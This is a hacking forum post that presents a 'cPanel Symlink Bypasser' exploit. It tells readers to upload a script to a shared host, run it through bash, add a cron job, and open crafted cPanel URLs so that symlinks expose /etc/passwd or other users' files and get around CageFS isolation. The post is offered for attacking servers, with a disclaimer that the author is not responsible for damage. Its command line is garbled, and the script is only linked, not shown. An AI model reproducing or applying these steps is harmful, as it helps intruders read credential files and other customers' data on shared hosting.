MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: CPanel Symlink Bypasser [Public Version]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Hi All!

Today we have a way to bypass cPanel servers !
By me (Hannibal Ksa) & R3m0t3 Nu11 

the author's not resposible for any damage, use at your own risk!


First download this file:


then upload it in /home/user
[Image: proxy?url=http%3A%2F%2Foi60.tinypic.com%...=image%2F*]







Code:
echo "Alm3refh bypass" ~| bash priv8.sh -s "Alm3refh bypass" -- [email protected]


then go to cron jobs and add this command:






[email protected] = your email




Once you add the command, you will receive some links in your email ..

example for the links:



[Image: proxy?url=http%3A%2F%2Foi61.tinypic.com%...=image%2F*]

https://yourbitch:2083/cpsession/tmp/user/webalizerftp/bypass1337.html



yourbitch=cpanel URL
cpsession=your cpanel session
 
[!] NOTE: bypass1337 = bypass102 
To make it easy, add the following after the cpanel URL:
 tmp/user/webalizerftp/bypass102.html
  
"THE FIRST THREE EXPLOITS ARE THE SAME USAGE"



https://yourbitch:2083/cpsession/frontend/x3/raw/index.html


yourbitch=cpanel URL
cpsession=your cpanel session
 
[!] NOTE: bypass1337 = bypass102

Scroll down and you'll see your file/symlink

bypass102.ini


Some pics for the exploits:

[Image: proxy?url=http%3A%2F%2Foi58.tinypic.com%...=image%2F*]


[Image: proxy?url=http%3A%2F%2Foi57.tinypic.com%...=image%2F*]


[Image: proxy?url=http%3A%2F%2Foi62.tinypic.com%...=image%2F*]


To change the file you want to make a symlink of edit the tool:

SYM="/etc/passwd"



We used /etc/passwd,
Although the tool bypasses the CageFS (Cloud) with the passwd file only!
But if the server doesn't uses CageFS it'll bypass user's files Biggrinsmiley


Don't forget to re-upload/edit the file after changing the target's file !

Also, the file using base64, if the server you're on doesn't have that feature. decode the file wink


cheers!

./hk